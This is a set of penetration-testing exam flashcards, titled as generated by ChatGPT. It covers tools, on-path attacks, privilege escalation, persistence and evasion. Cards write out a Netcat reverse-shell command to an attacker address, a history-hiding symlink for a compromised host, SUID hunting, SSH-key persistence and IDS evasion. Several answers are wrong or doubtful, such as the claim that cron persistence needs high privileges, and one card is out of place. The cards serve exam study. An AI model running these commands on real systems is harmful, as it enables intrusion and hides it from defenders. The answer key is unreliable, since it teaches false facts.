ChatGPT made up some questions Flashcards
Annie wants to permanently remove evidence of commands she entered in a Bash shell on a compromised Linux system. Which command should she use?
- history -c
- kill -9 $$
- echo "" > ~/.bash_history
- ln /dev/null ~/.bash_history -sf
ln /dev/null ~/.bash_history -sf
While history -c clears the current session’s history, the Bash history file will still persist on disk. The correct answer is D, ln /dev/null ~/.bash_history -sf, which creates a symbolic link to /dev/null for the history file. This effectively prevents any future commands from being written to ~/.bash_history, permanently erasing the history.
Kaiden is performing an automated web application security scan before deployment. Which tool is best suited for this task?
- nmap
- Nikto
- Wireshark
- CeWL
Nikto
Nikto is a dedicated web application security scanner designed to identify vulnerabilities such as misconfigurations, outdated software, and potential security issues in web servers and applications. Nmap is primarily a network scanner, Wireshark is a packet analysis tool, and CeWL is a tool for creating custom wordlists.
Steve is gathering information during a penetration test without actively interacting with or probing the target systems. What type of information is he collecting?
- OSINT
- HSI
- Background
- None of the above
OSINT
Open Source Intelligence (OSINT) involves collecting publicly available information about a target without engaging in direct interaction. This includes using sources like websites, social media, and publicly accessible databases. It is a passive reconnaissance technique.
Brian is investigating his organization’s servers to look for evidence of past breaches. What term best describes this activity?
- Penetration testing
- Vulnerability scanning
- Remediation
- Threat hunting
Threat hunting
Threat hunting involves proactively searching an organization’s infrastructure for signs of past or ongoing breaches. Unlike penetration testing or vulnerability scanning, threat hunting adopts the attacker’s mindset to find evidence of compromises.
Liam runs the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has Liam done?
- Started a reverse shell using Netcat
- Captured traffic on the Ethernet port to the console via Netcat
- Set up a bind shell using Netcat
- None of the above
Started a reverse shell using Netcat
The correct answer is A. Started a reverse shell using Netcat. In this command, Netcat (nc) connects to the remote IP address (10.1.10.1) on port 7337 and executes the Bash shell (/bin/sh). This creates a reverse shell where the compromised system initiates the connection to the attacker’s system.
Alaina wants to conduct an on-path attack against a target system. Which technique can she use to make it appear she has the IP address of a trusted server?
- ARP spoofing
- IP proofing
- DHCP pirating
- Spoofmastering
ARP spoofing
ARP spoofing involves sending forged ARP responses to associate the attacker’s MAC address with the IP address of a trusted server. This allows the attacker to intercept traffic intended for the legitimate server, enabling an on-path attack.
Spoofmastering and IP proofing are made-up terms.
DHCP pirating
DHCP pirating involves an attacker compromising or impersonating a DHCP server to distribute rogue IP configurations to clients on a network. This can be used to redirect traffic, enable man-in-the-middle attacks, or disrupt network connectivity.
Michael’s social engineering attack relies on telling staff members that others have already provided the information he is requesting. What motivation technique is he using?
- Authority
- Scarcity
- Likeness
- Social proof
Social proof
Explanation:
The correct answer is D. Social proof. Social proof relies on convincing the target that others have already taken a specific action or provided the requested information, leveraging the target’s trust in collective behavior. Likeness relies on building rapport and finding commonalities with the target.
Vincent wants access to workstations at his target organization but cannot gain entry to the building or remote access. What technique can he use to attempt physical compromise?
- Shoulder surfing
- Kerberoasting
- USB key drop
- Quid pro quo
USB key drop
A USB key drop involves leaving malicious USB drives in accessible locations to tempt employees into plugging them into their workstations. This technique relies on human curiosity and can install malware or provide the attacker with access.
Jennifer discovers the following file attributes on a Linux system:
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture
What type of file has she found?
- An encrypted file
- A hashed file
- A SUID file
- A SIP file
A SUID file
Explanation:
The “s” in the file permissions indicates that this is a SUID (Set User ID) file. When executed, it runs with the permissions of its owner (in this case, root) rather than the user who runs it. This can be a security risk if improperly managed.
SUID file
- A SUID file in Linux is indicated by an “s” in the owner execute position of the file permissions (e.g., -rwsr-xr--).
- This means that when the file is executed, it runs with the permissions of the file owner (typically root) rather than the user executing the file.
- SUID is a legitimate feature but can be a security risk if improperly configured, as it can be exploited to elevate privileges.
SIP file
- SIP (System Integrity Protection) is a macOS-specific security feature and does not apply directly to Linux files.
- SIP is designed to protect system files, directories, and processes from being modified, even by users with root privileges.
Chris suspects a Linux system he has compromised is a virtual machine. Which of the following techniques will NOT help confirm virtualization?
- Run systemd-detect-virt.
- Run ls -l /dev/disk/by-id.
- Run wmic baseboard get manufacturer, product.
- Run dmidecode to retrieve hardware information.
Run wmic baseboard get manufacturer, product.
The correct answer is C. Run wmic baseboard get manufacturer, product. This command is specific to Windows and cannot be used on a Linux system to check for virtualization. The other options are valid methods for identifying virtualization on Linux.
Which of the following tools is best suited for performing passive reconnaissance using open-source intelligence (OSINT)?
- Nmap
- Shodan
- Metasploit
- Nikto
Shodan
Shodan is a search engine specifically designed to identify devices connected to the internet and provide OSINT for passive reconnaissance. It allows penetration testers to gather information without directly interacting with the target. Tools like Nmap, Metasploit, and Nikto involve active interaction and scanning of the target systems.
What type of privilege escalation involves exploiting software bugs to gain higher permissions on a system?
- Vertical privilege escalation
- Horizontal privilege escalation
- Exploit chaining
- Social engineering
Vertical privilege escalation
Vertical privilege escalation occurs when an attacker exploits software bugs or vulnerabilities to gain higher permissions, such as moving from a standard user account to an administrative account. Horizontal privilege escalation, in contrast, involves accessing another user’s data or privileges at the same level.
What is the main purpose of setting up a SOCKS proxy during a penetration test?
- To intercept and modify web traffic
- To anonymize the penetration tester’s traffic
- To route traffic through a compromised system for lateral movement
- To exfiltrate data from a target network
To route traffic through a compromised system for lateral movement
A SOCKS proxy is commonly used during penetration testing to route traffic through a compromised system. This allows the penetration tester to perform lateral movement within the target network while maintaining control over traffic flow. Intercepting or modifying web traffic would typically involve tools like Burp Suite, not SOCKS proxies.
Which type of vulnerability occurs when an application includes unvalidated user input in a web request without proper encoding or validation?
- Cross-Site Scripting (XSS)
- SQL Injection
- File Inclusion
- Command Injection
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) vulnerabilities occur when an application fails to properly validate or encode user input, allowing malicious scripts to be executed in the browser of another user. This can result in data theft, session hijacking, or unauthorized actions on behalf of the victim. SQL injection, file inclusion, and command injection target different components of a system.
Which of the following tools would a penetration tester use to test for directory traversal vulnerabilities in a web application?
- Burp Suite
- Metasploit
- Nikto
- Hydra
Nikto
Nikto is a web server scanner designed to identify vulnerabilities, including directory traversal, outdated software, and insecure configurations. While Burp Suite can also test for web vulnerabilities, it requires manual configuration for such tests. Metasploit focuses on exploits, and Hydra is used for password attacks.
What technique can attackers use to spoof their IP address during an on-path attack?
- MAC flooding
- IP spoofing
- VLAN hopping
- DNS cache poisoning
IP spoofing
Explanation:
IP spoofing involves forging the source IP address in packets to make them appear as if they originate from a trusted source. This technique is commonly used during on-path attacks to intercept or redirect traffic. DNS cache poisoning manipulates DNS responses, but it doesn’t spoof IP addresses directly.
IP spoofing
- A technique used in cybersecurity to forge the source IP address of a packet, making it appear as though the packet originates from a trusted source.
- Attackers use IP spoofing to bypass security measures, hide their identity, or conduct specific types of attacks such as on-path attacks or denial-of-service (DoS) attacks.
What does the chmod 4755 command do when applied to a Linux executable file?
- Makes the file writable by all users
- Sets the SUID bit, allowing execution with the owner’s privileges
- Hides the file from directory listings
- Denies execution for non-root users
Sets the SUID bit, allowing execution with the owner’s privileges
The chmod 4755 command sets the SUID (Set User ID) bit on an executable file, enabling it to execute with the permissions of the file’s owner rather than the user running it. This is often used for system binaries but can be a security risk if misused.
Which of the following best describes the purpose of a honeypot in penetration testing?
- To identify vulnerabilities in internal systems
- To attract and monitor attackers’ activities
- To prevent unauthorized access to critical systems
- To provide redundancy for high-availability services
To attract and monitor attackers’ activities
A honeypot is a decoy system designed to lure attackers and monitor their behavior, providing valuable insights into their tactics, techniques, and procedures. It is not intended for system protection or redundancy but rather as a tool for detection and research.
Which scripting language is commonly used to automate penetration testing tasks and create custom scripts for exploits?
- PowerShell
- Ruby
- Python
- Perl
Python
Python is one of the most widely used scripting languages for automating penetration testing tasks and developing custom exploits due to its versatility, extensive libraries, and ease of use. While PowerShell is used in Windows environments, and Ruby and Perl are also scripting options, Python is the most common choice for penetration testing.
SOCKS proxy
- A transport layer proxy that routes traffic through an intermediary, supporting protocols like TCP and UDP.
- Commonly used in penetration testing for lateral movement, allowing traffic to pivot through a compromised host and access internal networks.
- Can anonymize traffic by masking the original source.
DNS poisoning
- Also known as DNS cache poisoning or DNS spoofing.
- An attack that corrupts the DNS resolution process.
- Manipulates the DNS cache of a resolver or a user’s machine to redirect traffic from legitimate websites to malicious ones without the user’s knowledge.
chmod 4755
Turns the file into a SUID file: when the file is executed, it runs with the privileges of the file owner, regardless of the user’s privileges. Commonly used for system utilities that require elevated privileges (e.g., /usr/bin/passwd).
- The first digit, 4 (SetUID bit): sets the SUID (Set User ID) bit on the file.
- The remaining digits, 755 (standard file permissions): represent the file’s owner, group, and others permissions.
- 7 (owner): read (r), write (w), and execute (x) permissions.
- 5 (group): read (r) and execute (x) permissions.
- 5 (others): read (r) and execute (x) permissions.
You are conducting a penetration test and need to identify which systems on a target network are vulnerable to remote code execution exploits. Which of the following tools is most suited for this task, and why?
- Nikto
- Nmap
- Wireshark
- Burp Suite
Nmap
Nmap is a versatile network scanner that can perform detailed reconnaissance of systems on a network. With the use of scripts (such as the Nmap Scripting Engine or NSE), it can check for specific vulnerabilities, including those that allow remote code execution. Nikto (Option A) is primarily a web server scanner and is not used for general network vulnerability scanning.
During a penetration test, you gain access to a Linux system and want to maintain persistence. Which of the following methods is most likely to provide persistence without requiring high privileges?
- Creating a cron job to execute your payload
- Adding your payload to the system’s startup scripts
- Modifying the SSH authorized_keys file
- Installing a rootkit
Modifying the SSH authorized_keys file
Modifying the ~/.ssh/authorized_keys file allows you to add your public SSH key to the target user’s SSH configuration. This method provides persistence without requiring elevated (root) privileges, as it only requires write access to the target user’s home directory. While creating a cron job (Option A) or modifying startup scripts (Option B) are valid persistence techniques, they typically require higher privileges. Installing a rootkit (Option D) is also persistent but involves significant risks and high privilege requirements.
A penetration tester needs to enumerate subdomains for a target organization as part of the reconnaissance phase. Which tool is most appropriate for this task?
- theHarvester
- Nessus
- Nikto
- Wireshark
theHarvester
theHarvester is specifically designed for gathering open-source intelligence (OSINT) such as subdomains, email addresses, and other related information from public sources. It is highly effective during the reconnaissance phase of a penetration test. Nessus (Option B) and Nikto (Option C) are used for vulnerability scanning, and Wireshark (Option D) captures and analyzes network traffic, making them unsuitable for this task.
You want to test whether a target system is vulnerable to a Man-in-the-Middle (MitM) attack by spoofing ARP messages. Which tool would you choose?
- Responder
- Aircrack-ng
- Ettercap
- Hydra
Ettercap
Ettercap is a tool designed specifically for carrying out Man-in-the-Middle (MitM) attacks, including ARP spoofing, allowing penetration testers to intercept, manipulate, or observe network traffic. Responder (Option A) is used for capturing credentials in network poisoning attacks but does not perform ARP spoofing. Aircrack-ng (Option B) focuses on wireless network attacks, and Hydra (Option D) is used for brute-forcing credentials.
Ettercap
- A comprehensive suite of tools for performing on-path (Man-in-the-Middle) attacks on a variety of systems and protocols.
- Allows penetration testers to intercept, monitor, and manipulate live network traffic.
- Open-source and supports plugins to extend its capabilities.
During a penetration test, you want to enumerate all user accounts on a Windows system using SMB. Which tool or technique would be best suited for this task?
- BloodHound
- PsExec
- Enum4linux
- CrackMapExec
Enum4linux
Enum4linux is a tool specifically designed for enumerating information from Windows systems using SMB, including user accounts, shared resources, and group memberships. BloodHound (Option A) is used for Active Directory enumeration and attack path analysis, PsExec (Option B) is for executing commands on remote systems, and CrackMapExec (Option D) is a broader post-exploitation tool that focuses on lateral movement and credential testing.
Enum4linux
- A Linux-based tool for enumerating information from Windows systems via SMB, including user accounts, shares, and other sensitive details.
- It is widely used during reconnaissance to gather critical data about a target environment.
- Supports additional enumeration tasks like identifying group memberships and operating system details.
You need to test a target network for vulnerabilities associated with the SMB protocol. Which tool would allow you to scan for and exploit SMB vulnerabilities efficiently?
- Metasploit
- Nikto
- Nessus
- Burp Suite
Metasploit
Metasploit is a powerful framework for vulnerability assessment and exploitation, making it ideal for identifying and exploiting SMB vulnerabilities. It includes specific modules, such as those for EternalBlue and SMB enumeration. Nessus (Option C) is a vulnerability scanner and can identify SMB vulnerabilities but does not exploit them. Nikto (Option B) is for web server scanning, and Burp Suite (Option D) focuses on web application vulnerabilities.
You are writing a script to automate the process of extracting IP addresses from log files. Which scripting language would be the most efficient and commonly used for this task in penetration testing?
- Python
- Bash
- Ruby
- PowerShell
Python
Python is highly efficient and widely used in penetration testing due to its simplicity and extensive libraries for handling tasks like string manipulation, regex operations, and file processing. While Bash (Option B) is useful for shell scripting, Python is more powerful for processing structured data. Ruby (Option C) is less commonly used for this purpose, and PowerShell (Option D) is primarily tailored for Windows environments.
During a penetration test, you identify an open port running a MySQL service. Which tool would you use to test for vulnerabilities in the database?
- Burp Suite
- SQLmap
- Nikto
- Nessus
SQLmap
SQLmap is a tool designed for testing SQL injection vulnerabilities, making it ideal for testing MySQL and other databases for exploitable flaws. Burp Suite (Option A) is used for web application testing, Nikto (Option C) scans web servers for common vulnerabilities, and Nessus (Option D) is a general-purpose vulnerability scanner but not specifically focused on SQL injection.
Which tool would you use to craft custom packets for testing firewalls and IDS/IPS systems?
- Nmap
- Hping
- Nessus
- Hydra
Hping
Hping is a command-line tool used to craft and send custom packets, making it ideal for testing firewalls and intrusion detection/prevention systems (IDS/IPS). It provides flexibility in creating packets with specific headers, payloads, and flags. Nmap (Option A) is primarily a network scanning tool, Nessus (Option C) is for vulnerability assessment, and Hydra (Option D) is for brute-forcing credentials.
During a penetration test, you gain a limited shell on a Linux target. Which command will you use to attempt privilege escalation by checking for misconfigured SUID binaries?
- ls -al /usr/bin/
- sudo -l
- find / -perm -4000 -type f 2>/dev/null
- ps aux | grep root
find / -perm -4000 -type f 2>/dev/null
The command find / -perm -4000 -type f 2>/dev/null searches for files with the SUID bit set (-perm -4000) across the entire file system (/). SUID binaries can allow privilege escalation if they are misconfigured. While ls -al /usr/bin/ (Option A) lists files in a directory, it doesn’t find all SUID files. sudo -l (Option B) checks a user’s permissions with sudo but isn’t for finding SUID binaries. ps aux | grep root (Option D) lists processes run by the root user but doesn’t help with privilege escalation directly.
You need to test for insecure APIs in a web application. Which tool would be most effective?
- OWASP ZAP
- Nikto
- Aircrack-ng
- John the Ripper
OWASP ZAP
OWASP ZAP is a robust web application testing tool that includes features for API testing, such as intercepting and analyzing API requests and responses for vulnerabilities. Nikto (Option B) focuses on web server vulnerabilities, Aircrack-ng (Option C) is for wireless network testing, and John the Ripper (Option D) is for password cracking.
You suspect that an attacker has tampered with a critical log file on a compromised system. Which method would you use to verify the integrity of the log file?
- Compare the log file against a known good backup.
- Open the log file and inspect its contents manually.
- Search for known attack patterns in the log file.
- Run the ls command to check the file’s size and modification date.
Compare the log file against a known good backup
The most reliable way to verify the integrity of a log file is to compare it against a trusted, unaltered backup copy. This ensures that you detect even subtle modifications. Inspecting the file manually (Option B) may not reveal hidden changes, searching for attack patterns (Option C) might miss tampering unrelated to those patterns, and checking the file’s size and modification date with ls (Option D) provides limited information and can be easily manipulated by attackers.
During a penetration test, you discover that a target web application stores sensitive data in a session token without encryption. Which vulnerability best describes this issue?
- Insecure Direct Object Reference (IDOR)
- Session Fixation
- Information Disclosure
- Broken Authentication
Information Disclosure
Storing sensitive data in session tokens without encryption is an example of Information Disclosure. This vulnerability occurs when sensitive information is exposed in an unsafe manner, such as being stored in cleartext. Insecure Direct Object Reference (Option A) pertains to unauthorized access to objects, Session Fixation (Option B) relates to session management flaws, and Broken Authentication (Option D) involves failures in enforcing authentication mechanisms.
Which tool would you use to analyze Windows memory dumps for signs of malware or other malicious activity?
- Volatility
- Wireshark
- Metasploit
- BloodHound
Volatility
Volatility is a powerful tool for memory forensics and is specifically designed to analyze memory dumps from Windows and other operating systems. It can identify malware, processes, and other malicious activities in memory. Wireshark (Option B) analyzes network traffic, Metasploit (Option C) is an exploitation framework, and BloodHound (Option D) is used for Active Directory attack path mapping.
Volatility
- Purpose: A memory forensics framework used to analyze memory dumps from compromised systems.
- Capabilities: Identifies malware, suspicious processes, and other malicious activity in system memory.
- Use Case: Detecting malicious code and activities post-exploitation on Windows, Linux, and macOS.
You want to identify whether a Linux system is running inside a virtualized environment. Which command would provide this information?
- dmesg | grep virtual
- lsmod | grep vm
- ifconfig | grep eth0
- ps aux | grep vmware
dmesg | grep virtual
The dmesg command displays messages from the system’s kernel, and using grep virtual filters for virtualization-related information. This method is a reliable way to determine whether a system is running in a virtualized environment. While lsmod | grep vm (Option B) may show virtualization modules, it’s not always comprehensive. Options C and D do not directly identify virtualization.
A penetration tester is using a tool to simulate multiple types of web application attacks, including XSS and CSRF. Which tool is being used?
- BeEF
- OWASP ZAP
- Nikto
- Burp Suite
BeEF
BeEF (Browser Exploitation Framework) specializes in exploiting browser vulnerabilities, including Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). While Burp Suite (Option D) is a comprehensive web application testing tool, BeEF is specifically focused on browser-based attack scenarios. OWASP ZAP (Option B) is for general web application vulnerability testing, and Nikto (Option C) focuses on web server vulnerabilities.
You need to evade detection while performing a network scan on a target system. Which of the following techniques is the most effective?
- Fragmenting packets
- Using the -T4 timing option in Nmap
- Sending scans from a single IP address
- Scanning all ports simultaneously
Fragmenting packets
Fragmenting packets is an effective technique for evading detection because it splits the scan traffic into smaller packets, making it harder for intrusion detection systems (IDS) to recognize and block the activity. Using the -T4 timing option (Option B) increases scanning speed but is more likely to trigger detection. Sending scans from a single IP address (Option C) and scanning all ports simultaneously (Option D) are also more conspicuous and likely to be detected.